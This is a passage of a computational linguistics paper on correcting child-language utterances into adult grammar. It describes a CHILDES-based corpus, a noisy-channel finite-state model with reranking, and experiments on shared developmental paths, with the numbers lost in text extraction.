produce linguistic forms that do not conform to adult grammar. in this paper, we introduce a data set and approach for sys- tematically modeling this child-adult grammar divergence. our corpus consists of child sen- tences with corrected adult forms. we bridge the gap between these forms with a discrim- inatively reranked noisy channel model that translates child sentences into equivalent adult utterances. our method outperforms mt and esl baselines, reducing child error by %. our model allows us to chart specific aspects of grammar development in longitudinal stud- ies of children, and investigate the hypothesis that children share a common developmental path in language acquisition. introduction since the publication of the brown study ( ), the existence of standard stages of development has been an underlying assumption in the study of first language learning. as a child moves towards lan- guage mastery, their language use grows predictably to include more complex syntactic structures, even- tually converging to full adult usage. in the course of this process, children may produce linguistic forms that do not conform to the grammatical standard. from the adult point of view these are language er- rors, a label which implies a faulty production. con- sidering the work-in-progress nature of a child lan- guage learner, these divergences could also be de- scribed as expressions of the structural differences between child and adult grammar. the predictability of these divergences has been observed by psychol- ogists, linguists and parents (owens, ). our work leverages the differences between child and adult language to make two contributions to- wards the study of language acquisition. first, we provide a corpus of errorful child sentences anno- tated with adult-like rephrasings. this data will al- low researchers to test hypotheses and build models relating the development of child language to adult forms. our second contribution is a probabilistic model trained on our corpus that predicts a gram- matical rephrasing given an errorful child sentence. the generative assumption of our model is that sentences begin in underlying adult forms, and are then stochastically transformed into observed child utterances. given an observed child utterance s, we calculate the probability of the corrected adult trans- lation t as p(t|s) ∝ p(s|t)p(t), where p(t) is an adult language model and p(s|t) is a noise model crafted to capture child grammar errors like omission of certain function words and corruptions of tense or declension. the parame- ters of this noise model are estimated using our cor- pus of child and adult-form utterances, using em to handle unobserved word alignments. we use this generative model to produce n-best lists of candi- date corrections which are then reranked using long range sentence features in a discriminative frame- work (collins and roark, ). for the remainder of this paper we use “error” and “diver- gence” interchangeably. one could argue that our noisy channel model mirrors the cognitive process of child language pro- duction by appealing to the hypothesis that children rapidly learn adult-like grammar but produce errors due to performance factors (bloom, ; ham- burger and crain, ). that being said, our pri- mary goal in this paper is not cognitive plausibility, but rather the creation of a practical tool to aid in the empirical study of language acquisition. by au- tomatically inferring adult-like forms of child sen- tences, our model can highlight and compare devel- opmental trends of children over time using large quantities of data, while minimizing the need for hu- man annotation. besides this, our model’s predictive success it- self has theoretical implications. by aggregating training and testing data across children, our model instantiates the brown hypothesis of a shared de- velopmental path. even when adequate per-child training data exists, using data only from other chil- dren leads to no degradation in performance, sug- gesting that the learned parameters capture general child language phenomena and not just individual habits. besides aggregating across children, our model coarsely lumps together all stages of devel- opment, providing a frozen snapshot of child gram- mar. this establishes a baseline for more cognitively plausible and temporally dynamic models. we compare our correction system against two baselines, a phrase-based machine translation (mt) system, and a model designed for english second language (esl) error correction. relative to the best performing baseline, our approach achieves a % decrease in word error-rate and a four point increase in bleu score. we analyze the perfor- mance of our system on various child error cate- gories, highlighting our model’s strengths (correct- ing be drops and morphological overgeneralizations) as well as its weaknesses (correcting pronoun and auxiliary drops). we also assess the learning rate of our model, showing that very little annotation is needed to achieve high performance. finally, to showcase a potential application, we use our model to chart one aspect of four children’s grammar ac- quisition over time. while generally vindicating the brown thesis of a common developmental path, the results point to subtleties in variation across individ- uals that merit further investigation. background and related work while child error correction is a novel task, com- putational methods are frequently used to study first language acquisition. the computational study of speech is facilitated by talkbank (macwhinney, ), a large database of transcribed dialogues in- cluding childes (macwhinney, ), a subsec- tion composed entirely of child conversation data. computational tools have been developed specif- ically for the large-scale analysis of childes. these tools enable further computational study such as the automatic calculation of the language devel- opment metrics ipsyn (sagae et al., ) and d-level (lu, ), or the automatic formula- tion of novel language development metrics them- selves (sahakian and snyder, ). the availability of child language is also key to the design of computational models of language learning (alishahi, ), which can support the plausibility of proposed human strategies for tasks like semantic role labeling (connor et al., ) or word learning (regier, ). to our knowledge this paper is the first work on error correction in the first language learning domain. previous work has employed a classifier-based approach to iden- tify speech errors indicative of language disorders in children (morley and prud’hommeaux, ). automatic correction of second language (l ) writing is a common objective in computer assisted language learning (call). these tasks generally target high-frequency error categories including ar- ticle, word-form, and preposition choice. previous work in call error correction includes identify- ing word choice errors in toefl essays based on context (chodorow and leacock, ), correcting errors with a generative lattice and pcfg rerank- ing (lee and seneff, ), and identifying a broad range of errors in esl essays by examining linguis- tic features of words in sequence (gamon, ). in a shared esl correction task (dale and kilgar- riff, ), the best performing system (rozovskaya et al., ) corrected preposition, article, punctu- ation and spelling errors by building classifiers for each category. this line of work is grounded in the practical application of automatic error correction as a learning tool for esl students. statistical machine translation (smt) has been applied in diverse contexts including grammar cor- rection as well as paraphrasing (quirk et al., ), question answering (echihabi and marcu, ) and prediction of twitter responses (ritter et al., ). in the realm of error correction, smt has been ap- plied to identify and correct spelling errors in inter- net search queries (sun et al., ). within call, park and levy ( ) took an unsupervised smt approach to esl error correction using weighted fi- nite state transducers (fsts). the work described in this paper is inspired by that of park and levy, and in section we detail differences between our approaches. we also include their model as a base- line. data to train and evaluate our translation system, we first collected a corpus of , errorful child-language utterances from the american english portion of the childes database. to encourage diversity in the grammatical divergences captured by our corpus, our data is drawn from a large pool of studies (see bibliography for the full list of citations). in the annotation process, candidate child sen- tences were randomly selected from the pool and classified by hand as either grammatically correct, divergent or unclassifiable (when it was not possi- ble to tell what a child is trying to say). we con- tinued this process until , divergent sentences were found. along the way we also encountered , grammatically correct utterances and that were unclassifiable. because childes includes speech samples from children of diverse age, back- ground and language ability, our corpus does not capture any specific stage of language development. instead, the corpus represents a general snapshot of a learner who has not yet mastered english as their first language. to provide the grammatically correct counterpart to child data, our errorful sentences were corrected by workers on amazon’s mechanical turk web ser- vice. given a child utterance and its surrounding conversational context, annotators were instructed to translate the child utterance into adult-like en- glish. we limited eligible workers to native english these hand-classified sentences are available online along with our set of errorful sentences. error type child utterance insertion i did locked it. inflection more cookie? deletion that not how. lemma choice i got grain. overgeneralization i drawed it. table : examples of error types captured by our model. speakers residing in the us. we also required anno- tators to follow a brief tutorial in which they prac- tice correcting sample utterances according to our guidelines. these guidelines instructed workers to minimally alter sentences to be grammatically con- sistent with a conversation or written letter, without altering underlying meaning. annotators were eval- uated on a worker-by-worker basis and rejected in the rare case that they ignored our guidelines. ac- cepted workers were paid cents for correcting each set of sentences. to achieve a consistent judgment, we posted each set of sentences for correction by different annotators. once multiple reference translations were ob- tained we selected a single best correction by plu- rality, arbitrating ties as necessary. there were sev- eral cases in which corrections obtained by plurality decision did not perfectly follow instructions. these were manually corrected. both the raw translations provided by individual annotators as well as the cu- rated final adult forms are provided online as part of our data set. resulting pairs of errorful child sen- tences and their adult-like corrections were split into % training, % development and % test data, which we use to build, tune and evaluate our gram- mar correction system. in the final test phase, devel- opment data is included in the training set. model according to our generative model, adult-like utter- ances are formed and then transformed by a noisy channel to become child sentences. the structure of our noise model is tailored to match our observa- tions of common child errors. these include: func- tion word insertions, function word deletions, swaps of function words and, inflectional changes to con- tent words. examples of each error type are given data is available at http://pages.cs.wisc.edu/~bsnyder in table . our model does not allow reorderings, and can thus be described in terms of word-by-word stochastic transformations to the adult sentence. we use word classes to parameterize our model: pronouns, negators, wh-words, conjunc- tions, prepositions, determiners, modal verbs, “be” verbs, other auxiliary verbs, and lexical content words. the list of words in each class is provided as part of our data set. for each input adult word w, the model generates output word w′ as a hierarchi- cal series of draws from multinomial distributions, conditioned on the original word w and its class c. all distributions receive an asymmetric dirichlet prior which favors retention of the adult word. with the sole exception of word insertions, the distribu- tions are parameterized and learned during train- ing. our model consists of multinomial distri- butions, with , free parameters. the precise form and parameterization of our model were handcrafted for performance on the de- velopment data, using trial and error. we also con- sidered more fine-grained model forms (i.e. one parameter for each non-lexical input-output word pair), as well as coarser parameterizations (i.e. a single shared parameter denoting any inflection change). the model we describe here seemed to achieve the best balance of specificity and general- ization. we now present pseudocode describing the noise model’s operation upon processing each word, along with a brief description of each step. action selection (lines - ): on reading an input word, an action category a is selected from a prob- ability distribution conditioned on the input word’s class. our model allows up to two function word insertions or deletions in a row before a swap is re- quired. lexical content words may not be deleted or inserted, only swapped. insert and delete (lines - ): the deletion case requires no decision after action selection. in the insertion case, the class of the inserted word, c′, is selected conditioned on cprev , the class of the previous adult word. the precise identity of the inserted word is then drawn from a uniform distribution over words in class c′. it is important to note that in the insertion case, the input word at a given iteration will be re-processed at the next iteration (lines - ). insdel ← for word w with class c, inflection f, lemma ` do : if insdel = then a ← swap else : a ∼{insert, delete, swap} | c end if if a = delete then : insdel++ c′ ← � w′ ← � : else if a = insert then insdel++ c′ ∼ classes | cprev , insert : w′ ∼ words in c′ | insert else insdel ← : c′ ← c if c ∈ uninflected-classes then w′ ∼ words in c | w, swap : else if c = aux then `′ ∼ aux-lemmas | `, swap f ′ ∼ inflections | f, swap : w′ ← combine(`′,f ′) else f ′ ∼ inflections | f, swap : w′ ← combine(`,f ′) end if end if : if w′ ∈ irregular then w′ ∼ overgen(w′)∪{w′} end if : if a = insert then goto line end if : end for swap (lines - ): in the swap case, a word of given class is substituted for another word in the same class. depending on the source word’s class, swaps are handled in slightly different ways. if the word is a modal, conjunction, determiner, preposi- tion, “wh-” word or negative, it is considered “unin- flected.” in these cases, a new word w′ is selected from all words in class c, conditioned on the source word w. if w is an auxiliary verb, the swap procedure con- sists of two parallel steps. a lemma is selected from possible auxiliary lemmas, conditioned on the lemma of the source word. in the second step, an output inflection type is selected from a distribution conditioned on the source word’s inflection. the precise output word is fully specified by the choice of lemma and conjugation. if w is not in either of the above two categories, it is a lexical word, and our model only allows changes in conjugation or declension. if the source word is a noun it may swap to singular or plural form con- ditioned on the source form. if the word is a verb, it may swap to any conjugated or non-finite form, again conditioned on the source form. lexical words that are not marked by celex (baayen et al., ) as nouns or verbs may only swap to the exact same word. overgeneralization (lines - ): finally, the noisy channel considers the possibility of produc- ing overgeneralized word forms (like “maked” and “childs”) in place of their correct irregular forms. the overgen function produces the incorrect over- generalized form. we draw from a distribution which chooses between this form and the correct original word. our model maintains separate dis- tributions for nouns (overgeneralized plurals) and verbs (overgeneralized past tense). implementation in this section, we describe steps necessary to build, train and test our error correction model. weighted finite state transducers (fsts) used in our model are constructed with openfst (allauzen et al., ). . sentence fsts these fsts provide the basis for our translation pro- cess. we represent sentences by building a simple linear chain fst, progressing from node to node with each arc accepting and yielding one word in the sentence. all arcs are weighted with probability one. auxiliary lemmas include have, do, go, will, and get. . noise fst the noise model provides a conditional probability over child sentences given an adult sentence. we en- code this model as a fst with several states, allow- ing us to track the number of consecutive insertions or deletions. we allow only two of these operations in a row, thereby constraining the length of the out- put sentence. this constraint results in three states (insdel = , insdel = , insdel = ), along with an end state. in our training data, only sentence pairs cannot be described by the noise model due to this constraint. each arc in the fst has an � or adult-language word as input symbol, and a possibly errorful child- language word or � as output symbol. each arc weight is the probability of transducing the input word to the output word, determined according to the parameterized distributions described in sec- tion . arcs corresponding to insertions or dele- tions lead to a new state (insdel++) and are not al- lowed from state insdel = . substitution arcs all lead back to state insdel = . word class infor- mation is given by a set of word lists for each non- lexical class. inflectional information is derived from celex. . language model fst the language model provides a prior distribution over adult form sentences. we build a a trigram language model fst with kneser-ney smoothing using opengrm (roark et al., ). the lan- guage model is trained on all parent speech in the childes studies from which our errorful sentences are drawn. in the language model fst, the input and output words of each arc are identical. arcs are weighted with the probability of the n-gram beginning with some prefix associated with the source node, and ending with the arc’s input/output word. in this setup, the probability of a string is the total weight of the path accepting and emitting that string. . training as detailed in section , our noise model consists of a series of multinomial distributions which govern word lists are included for reference with our dataset. that:that is:<eps> him:him his:him him:him his:him hat:hat hats:hat .:. figure : a simplified decoding fst for the child sentence “that him hat.” in an actual decoding fst many more transduction arcs exist, including those translating “that” and “him” to any determiner and pronoun, respectively, and affording opportunities for many more deletions and insertions. input and output strings given by fst paths correspond to possible adult-to-child translations. the transformation from adult word to child word, al- lowing limited insertions and deletions. we estimate parameters θ for these distributions that maximize their posterior probability given the observed train- ing sentences {(s,t)}. since our language model p(t) does not depend on on the noise model param- eters, this objective is equivalent to jointly maximiz- ing the prior and the conditional likelihoods of child sentences given adult sentences: argmax θ p(θ) ∏ p(s|t,θ) to represent all possible derivations of each child sentence s from its adult translation t, we compose the sentence fsts with the noise model, obtaining: fsttrain = fstt ◦fstnoise ◦fsts each path through fsttrain corresponds to a sin- gle derivation d, with path weight p(s,d|t,θ). by summing all path weights, we obtain p(s|t,θ). we use a map-em algorithm to maximize our objective while summing over all possible derivations. our training scheme relies on fsts weighted in the v-expectation semiring (eisner, ), imple- mented using code from fstrain (dreyer et al., ). besides carrying probabilities, arc weights are sup- plemented with a vector to indicate parameter counts involved in the arc traversal. the v-expectation semiring is designed so that the total arc weight of all paths through the fst yields both the probabil- ity p(s|t,θ), along with expected parameter counts. our em algorithm proceeds as follows: we start by initializing all parameters to uniform distribu- tions with random noise. we then weight the arcs in fstnoise accordingly. for each sentence pair (s,t), we build fsttrain by composition with our noise model, as described in the previous paragraph. we then compute the total arc weight of all paths through fsttrain by relabeling all input and output symbols to � and then reducing fsttrain to a single state using epsilon removal (mohri, ). the stop- ping weight of this single state is the sum of all paths through the original fst, yielding the probability p(s|t,θ), along with expected parameter counts ac- cording to our current distributions. we then reesti- mate θ using the expected counts plus pseudo-counts given by priors, and repeat this process until conver- gence. besides smoothing our estimated distributions, the pseudo-counts given by our asymmetric dirich- let priors favor multinomials that retain the adult word form (swaps, identical lemmas, and identical inflections). concretely, we use pseudo-counts of . for these favored outcomes, and pseudo-counts of . for all others. in practice, of the child sentences in our data set cannot be translated into a corresponding adult version using our model. this is due to a range of rare phenomena like rephrasing, lexical word swaps and word-order errors. in these cases, the composed fst has no valid paths from start to finish and the sentence is removed from training. we run em for iterations, at which time the log likelihood of all sentences generally converges to within . . . decoding after training our noise model, we apply the sys- tem to translate divergent child language to adult- like speech. as in training, the noise fst is com- posed with the fst for each child sentence s. in corresponding to dirichlet hyperparameters of . and . respectively. place of the adult sentence, the language model fst is used, yielding: fstdecode = fstlm ◦fstnoise ◦fsts each path through fstdecode corresponds to an adult translation and derivation (t,d), with path weight p(s,d|t,θ)p(t). thus, the highest-weight path corresponds to the most likely translation and derivation pair: argmax t,d p(t,d|s,θ) we use a dynamic program to find the n highest- weight paths with distinct adult sentences t. this can be viewed as finding the n most likely adult trans- lations, using a viterbi approximation p(t|s,θ) = argmaxd p(t,d|s,θ). in our experiments we set n = . a simplified fstdecode example is shown in figure . . discriminative reranking to more flexibly capture long range syntactic fea- tures, we embed our noisy channel model in a dis- criminative reranking procedure. for each child sen- tence s, we take the n-best candidate translations t , . . . , tn from the underlying generative model, as described in the previous section. we then map each candidate translation ti to a d-dimensional feature vector f(s,ti). the reranking model then uses a d- dimensional weight vector λ to predict the candidate translation with highest linear score: t∗ = argmax ti λ ·f(s,ti) to simulate test conditions, we train the weight vec- tor on n-best lists from -fold cross-validation over training data, using the averaged perceptron rerank- ing algorithm (collins and roark, ). since the n-best list might not include the exact gold-standard correction, a target correction which maximizes our evaluation metric is chosen from the list. the n-best list is non-linearly separable, so perceptron training iterates for rounds, when it is terminated with- out converging. our feature function f(s,ti) yields nine boolean and real-valued features derived from (i) the fst that generates child sentence s from candidate adult- form ti, and (ii) the pos sequence and dependency parse of candidate ti obtained with the stanford parser (de marneffe et al., ). features were se- lected based on their performance in reranking held- out development data from the training set. rerank- ing features are given below: generative model probabilities: we first include the joint probability of the child sentence s and can- didate translation ti, given by the generative model: plm(ti)pnoise(s|ti). we also isolate the candidate translation’s language model and noise model prob- abilities as features. since both of these proba- bilities naturally favor shorter sentences, we scale them to sentence length, yielding n √ plm(ti) and n √ pnoise(s|ti) respectively. by not scaling the joint probability, we allow the reranker to learn its own bias towards longer or shorter corrected sentences. contains noun subject, accusative noun sub- ject: the first boolean feature indicates whether the dependency parse of candidate translation ti con- tains a “nsubj” relation. the second indicates if a “nsubj” relation exists where the dependent is an ac- cusative pronoun (e.g. “him ate the cookie”). these features and the one following have previously been used in classifier based error detection (morley and prud’hommeaux, ). contains finite verb: this boolean feature is true if the pos tags of ti include a finite verb. this feature differentiates structures like “i am going” from “i going.” question template features: we define tem- plates for wh- and yes-no questions. a sentence fits the wh- question template if it begins with a wh- word, followed by an auxiliary or copula verb (e.g. “who did...”). a sentence fits the yes-no template when it begins with an auxiliary or copula verb, then a noun subject followed by a verb or adjective (e.g. “are you going...”). we include one boolean feature for each of these templates indicating when a tem- plate match is inappropriate, when the original child utterance terminates in a period instead of a question mark. in addition to the two features for inappropri- ate template matches, we have a single feature that signals appropriate matches of either question tem- plate — when the original child utterance terminates in a question mark. child utterance human correction machine correction i am not put in my mouth. i am not putting it in my mouth. i am not going to put it in my mouth. this one have water? does this one have water? this one has water? want to read the book. i want to read the book. you want to read the book. why you going to get two? why are you going to get two? why are you going to have two? you very sticky. you are very sticky. you are very sticky. he no like. he does not like it. he does not like that. yeah it looks a lady. yeah it looks like a lady yeah it looks like a lady. eleanor come too. eleanor came too. eleanor come too. desk in here. the desk is in here desk is in here. why he’s doc? why is he called doc? he’s up doc? table : randomly selected test output generated by our complete error correction model, along with corresponding child utterances and human corrections. experiments and analysis baselines we compare our system’s performance with two pre-existing baselines. the first is a stan- dard phrase-based machine translation system using moses (koehn et al., ) with giza++ (och and ney, ) word alignments. we hold out % of the training data for tuning using the mert algo- rithm with bleu objective (och, ). the second baseline is our implementation of the esl error correction system described by park and levy ( ). like our system, this baseline trains fst noise models using em in the v-expectation semiring. our noise model is crafted specifically for the child language domain, and so differs from park and levy’s in several ways: first, we capture a wider range of word-swaps, with richer parameteri- zation allowing many more translation options. as a result, our model has , parameters, many more than the esl model’s . these parameters corre- spond to learned probability distributions, whereas in the esl model many of the distributions are fixed as uniform. we also capture a larger class of errors, including deletions, change of auxiliary lemma, and inflectional overgeneralizations. finally, we use a discriminative reranking step to model long-range syntactic dependencies. although the esl model is originally geared towards fully unsupervised train- ing, we train this baseline in the same supervised framework as our model. evaluation and performance we train all models on % of our child-adult sentence pairs and test on the remaining %. for illustration, selected output from our model is shown in table . predictions are evaluated with bleu score (pap- ineni et al., ) and word error rate (wer), de- fined as the minimum string edit distance (in words) between reference and predicted translations, di- vided by length of the reference. as a control, we compare all results against scores for the uncor- rected child sentences themselves. as reported in table , our model achieves the best scores for both metrics. bleu score increases from for child sentences to , while wer is reduced from . to . . interestingly, moses achieves a bleu score of — still four points below our model — but ac- tually increases wer to . . for both metrics, the esl system increases error. this is not surprising given that its intended application is in an entirely different domain. error analysis we measured the performance of our model over the six most common categories of child divergence, including deletions of various function words and overgeneralizations of past tense forms (e.g. “maked” for “made”). we first iden- tified model parameters associated with each cate- gory, and then counted the number of correct and in- correct parameter firings on the test sentences. as table indicates, our model performs reasonably well on “be” verb deletions, preposition deletions, and overgeneralizations, but has difficulty correcting pronoun and auxiliary deletions. in general, hypothesizing dropped words burdens the noise model by adding additional draws from multinomial distributions to the derivation. to pre- bleu wer wer reranking . . bleu reranking . . no reranking . . moses . . esl . . child sentences . . table : wer and bleu scores. our system’s perfor- mance using various reranking schemes (bleu objec- tive, wer objective and none) is contrasted with moses mt and esl error correction baselines, as well as un- corrected test sentences. best performance under each metric is shown in bold. dict a deletion, either the language model or the reranker must strongly prefer including the omit- ted word. a syntax-based noise model may achieve better performance in detecting and correcting child word drops. while our model parameterization and perfor- mance rely on the largely constrained nature of child language errors, we observe some instances in which it is overly restrictive. for % of utterances in our corpus, it is impossible to recover the exact gold-standard adult sentence. these sentences fea- ture errors like reordering or lexical lemma swaps — for example “i talk mexican” for “i speak spanish.” while our model may correct other errors in these sentences, a perfect correction is unattainable. sometimes, our model produces appropriate forms which by happenstance do not conform to the annotators’ decision. for example, in the second row of table , the model corrects “this one have water?” to “this one has water?”, instead of the more verbose correction chosen by the annotators (“does this one have water?”). similarly, our model sometimes produces corrections which seem appro- priate in isolation, but do not preserve the meaning implied by the larger conversational context. for ex- ample, in row three of table , the sentence “want to read the book.” is recognized both by our hu- man annotators and the system as requiring a pro- noun subject. unlike the annotators, however, the model has no knowledge of conversational context, so it chooses the highest probability pronoun — in this case “you” — instead of the contextually correct “i.” error type count f p r be deletions . . . pronoun deletions . . . aux. deletions . . . prep. deletions . . . det. deletions . . . overgen. past . . . table : frequency of the six most common error types in test data, along with our model’s corresponding f- measure, precision and recall. all counts are ±. at p = . under a binomial normal approximation inter- val. % % % % % % % % % % % . . . . . . . % train data b l e u w e r figure : performance with limited training data. wer is drawn as the dashed line, and bleu as the solid line. learning curves in figure , we see that the learning curves for our model initially rise sharply, then remain relatively flat. using only % of our training data ( sentences), we increase bleu from (using just the language model) to almost . we only reach our reported bleu score of when adding the final % of training data. this result emphasizes the specificity of our parameteri- zation. because our model is so tailored to the child- language scenario, only a few examples of each er- ror type are needed to find good parameter values. we suspect that more annotated data would lead to a continued but slow increase in performance. training and testing across children we use our system to investigate the hypothesis that lan- guage acquisition follows a similar path across chil- dren (brown, ). to test this hypothesis, we train our model on all children excluding adam, who alone is responsible for % of our sentences. we then test the learned model on the separated adam trained on: bleu wer adam . . all others . . uncorrected . . table : performance on adam’s sentences training on other children, versus training on himself. best perfor- mance under each metric is shown in bold. data. these results are contrasted with performance of -fold cross validation training and testing solely on adam’s utterances. performance statistics are given in table . we first note that models trained in both scenar- ios lead to large error reductions over the child sen- tences. this provides evidence that our model cap- tures general, and not child-specific, error patterns. although training exclusively on adam does lead to increased bleu score ( . vs . ), wer is minimized when using the larger volume of train- ing data from other children (. vs . ). taken as a whole, these results suggest that training and testing on separate children does not degrade perfor- mance. this finding supports the general hypothesis of shared developmental paths. plotting child language errors over time af- ter training on annotated data, we predict diver- gences in all available data from the children in roger brown’s study — adam, eve and sarah — as well as abe (kuczaj, ), a child from a sep- arate study over a similar age-range. we plot each child’s per-utterance frequency of preposition omis- sions in figure . since we evaluate over , utterances and reranking has no impact on preposi- tion drop prediction, we skip the reranking step to save computation. in figure , we see that adam and sarah’s prepo- sition drops spike early, and then gradually decrease in frequency as their preposition use moves towards that of an adult. although eve’s data covers an ear- lier time period, we see that her pattern of prepo- sition drops shows a similar spike and gradual de- crease. this is consistent with eve’s general lan- guage precocity. brown’s conclusion — that the lan- guage development of these three children advanced in similar stages at different times — is consistent with our predictions. however, when we examine . . . . . . . adam eve sarah abe age (months) p e r- u tt e ra n c e f re q u e n c y figure : automatically detected preposition omissions in un-annotated utterances from four children over time. assuming perfect model predictions, frequencies are ±. at p = . under a binomial normal approxima- tion interval. prediction error is given in table . abe we do not observe the same pattern. this points to a degree of variance across children, and suggests the use of our model as a tool for further empirical refinement of language development hy- potheses. discussion our error correction system is de- signed to be more constrained than a full-scale mt system, focusing parameter learning on errors that are known to be common to child language learn- ers. reorderings are prohibited, lexical word swaps are limited to inflectional changes, and deletions are restricted to function word categories. by highly re- stricting our hypothesis space, we provide an induc- tive bias for our model that matches the child lan- guage domain. this is particularly important since the size of our training set is much smaller than that usually used in mt. indeed, as figure shows, very little data is needed to achieve good performance. in contrast, the esl baseline suffers because its generative model is too restricted for the domain of transcribed child language. as shown above in table , child deletions of function words are the most frequent error types in our data. since the esl model does not capture word deletions, and has a more restricted notion of word swaps, % of child sentences in our training corpus cannot be translated to their reference adult versions. the result is that the esl model tends to rely too heavily on the lan- guage model. for example, on the sentence “i com- though it is of course possible that a similar spike and drop-off occurred earlier in abe’s development. ing to you,” the esl model improves n-gram prob- ability by producing “i came to you” instead of the correct “i am coming to you”. this increases error over the child sentence itself. in addition to the domain-specific generative model, our approach has the advantage of long- range syntactic information encoded by reranking features. although the perceptron algorithm places high weight on the generative model probability, it alters the predictions in out of test sentences, in all cases an improvement. three of these rerank- ing changes add a noun subject, five enforce ques- tion structure, and nine add a main verb. conclusion and future work in this paper we introduce a corpus of divergent child sentences with corresponding adult forms, en- abling the systematic computational modeling of child language by relating it to adult grammar. we propose a child-to-adult translation task as a means to investigate child language development, and pro- vide an initial model for this task. our model is based on a noisy-channel assump- tion, allowing for the deletion and corruption of in- dividual words, and is trained using fst techniques. despite the debatable cognitive plausibility of our setup, our results demonstrate that our model cap- tures many standard divergences and reduces the average error of child sentences by approximately %, with high performance on specific frequently occurring error types. the model allows us to chart aspects of language development over time, without the need for addi- tional human annotation. our experiments show that children share common developmental stages in lan- guage learning, while pointing to child-specific sub- tleties in preposition use. in future work, we intend to dynamically model child language ability as it grows and shifts in re- sponse to internal processes and external stimuli. we also plan to develop and train models specializ- ing in the detection of specific error categories. by explicitly shifting our model’s objective from child- adult translation to the detection of some particular error, we hope to improve our analysis of child di- vergences over time. acknowledgments the authors thank the reviewers and acknowledge support by the nsf (grant iis- ) and a re- search gift from google. any opinions, findings, or conclusions are those of the authors, and do not nec- essarily reflect the views of the nsf. references a. alishahi. . computational modeling of human language acquisition. synthesis lectures on human language technologies, ( ): – . c. allauzen, m. riley, j. schalkwyk, w. skut, and m. mohri. . openfst: a general and efficient weighted finite-state transducer library. implementa- tion and application of automata, pages – . r.h. baayen, r. piepenbrock, and l. gulikers. . celex (cd-rom). linguistic data consortium. e. bates, i. bretherton, and l. snyder. . from first words to grammar: individual differences and disso- ciable mechanisms. cambridge university press. d.c. bellinger and j.b. gleason. . sex differences in parental directives to young children. sex roles, ( ): – . l. bliss. . the development of modals. journal of applied developmental psychology, : – . l. bloom, l. hood, and p. lightbown. . imitation in language development: if, when, and why. cognitive psychology, ( ): – . l. bloom, p. lightbown, l. hood, m. bowerman, m. maratsos, and m.p. maratsos. . structure and variation in child language. monographs of the soci- ety for research in child development, pages – . l. bloom. . one word at a time: the use of single word utterances before syntax. mouton. p. bloom. . subjectless sentences in child language. linguistic inquiry, ( ): – . j.n. bohannon iii and a.l. marquis. . chil- dren’s control of adult speech. child development, ( ): – . r. brown. . a first language: the early stages. harvard university press. v. carlson-luden. . causal understanding in the -month-old. ph.d. thesis, university of colorado at boulder. e.c. carterette and m.h. jones. . informal speech: alphabetic & phonemic texts with statistical analyses and tables. university of california press. m. chodorow and c. leacock. . an unsupervised method for detecting grammatical errors. in proceed- ings of the north american chapter of the association for computational linguistics, pages – . m. collins and b. roark. . incremental parsing with the perceptron algorithm. in proceedings of the asso- ciation for computational linguistics, pages – , barcelona, spain, july. m. connor, y. gertner, c. fisher, and d. roth. . baby srl: modeling early language acquisition. in proceedings of the conference on computational nat- ural language learning, pages – . r. dale and a. kilgarriff. . helping our own: the hoo pilot shared task. in proceedings of the eu- ropean workshop on natural language generation, pages – . m.c. de marneffe, b. maccartney, and c.d. manning. . generating typed dependency parses from phrase structure parses. in proceedings of the in- ternational conference on language resources and evaluation, volume , pages – . m.j. demetras, k.n. post, and c.e. snow. . feed- back to first language learners: the role of repetitions and clarification questions. journal of child lan- guage, ( ): – . m.j. demetras. . working parents’ conversational responses to their two-year-old sons. m. dreyer, j.r. smith, and j. eisner. . latent- variable modeling of string transductions with finite- state methods. in proceedings of the conference on empirical methods in natural language processing, pages – . a. echihabi and d. marcu. . a noisy-channel ap- proach to question answering. in proceedings of the association for computational linguistics, pages – . j. eisner. . expectation semirings: flexible em for learning finite-state transducers. in proceedings of the esslli workshop on finite-state methods in nlp. m. gamon. . high-order sequence modeling for language learner error detection. in proceedings of the workshop on innovative use of nlp for building ed- ucational applications, pages – . l.c.g. haggerty. . what a two-and-one-half-year- old child said in one day. the pedagogical seminary and journal of genetic psychology, ( ): – . w.s. hall, w.c. tirre, a.l. brown, j.c. campoine, p.f. nardulli, ho abdulrahman, ma sozen, w.c. schno- brich, h. cecen, j.g. barnitz, et al. . the communicative environment of young children: social class, ethnic, and situational differences. bulletin of the center for children’s books, : . w.s. hall, w.e. nagy, and r.l. linn. . spoken words: effects of situation and social group on oral word usage and frequency. university of illinois at urbana-champaign, center for the study of reading. w.s. hall, w.e. nagy, and g. nottenburg. . sit- uational variation in the use of internal state words. technical report, university of illinois at urbana- champaign, center for the study of reading. h. hamburger and s. crain. . acquisition of cogni- tive compiling. cognition, ( ): – . r.p. higginson. . fixing: assimilation in language acquisition. university microfilms international. m.h. jones and e.c. carterette. . redundancy in children’s free-reading choices. journal of verbal learning and verbal behavior, ( - ): – . p. koehn, h. hoang, a. birch, c. callison-burch, m. federico, n. bertoldi, b. cowan, w. shen, c. moran, r. zens, et al. . moses: open source toolkit for statistical machine translation. in proceed- ings of the association for computational linguis- tics (interactive poster and demonstration sessions), pages – . s. a. kuczaj. . the acquisition of regular and irreg- ular past tense forms. journal of verbal learning and verbal behavior, ( ): – . j. lee and s. seneff. . automatic grammar cor- rection for second-language learners. in proceedings of the international conference on spoken language processing. x. lu. . automatic measurement of syntactic com- plexity in child language acquisition. international journal of corpus linguistics, ( ): – . b. macwhinney. . the childes project: tools for analyzing talk, volume . psychology press. b. macwhinney. . the talkbank project. cre- ating and digitizing language corpora: synchronic databases, : – . m. mohri. . system and method of epsilon removal of weighted automata and transducers, june . us patent , , . e. morley and e. prud’hommeaux. . using con- stituency and dependency parse features to identify er- rorful words in disordered language. in proceedings of the workshop on child, computer and interaction. a. ninio, c.e. snow, b.a. pan, and p.r. rollins. . classifying communicative acts in children’s interactions. journal of communication disorders, ( ): – . f.j. och and h. ney. . a systematic comparison of various statistical alignment models. computational linguistics, ( ): – . f.j. och. . minimum error rate training in statistical machine translation. in proceedings of the association for computational linguistics, pages – . r.e. owens. . language development: an intro- duction. pearson education, inc. k. papineni, s. roukos, t. ward, and w.j. zhu. . bleu: a method for automatic evaluation of machine translation. in proceedings of the association for computational linguistics, pages – . y.a. park and r. levy. . automated whole sentence grammar correction using a noisy channel model. pro- ceedings of the association for computational lin- guistics, pages – . a.m. peters. . the role of imitation in the devel- oping syntax of a blind child in perspectives on repeti- tion. text, ( ): – . k. post. . the language learning environment of laterborns in a rural florida community. ph.d. thesis, harvard university. c. quirk, c. brockett, and w. dolan. . monolin- gual machine translation for paraphrase generation. in proceedings of the conference on empirical methods in natural language processing, pages – . t. regier. . the emergence of words: attentional learning in form and meaning. cognitive science, ( ): – . a. ritter, c. cherry, and 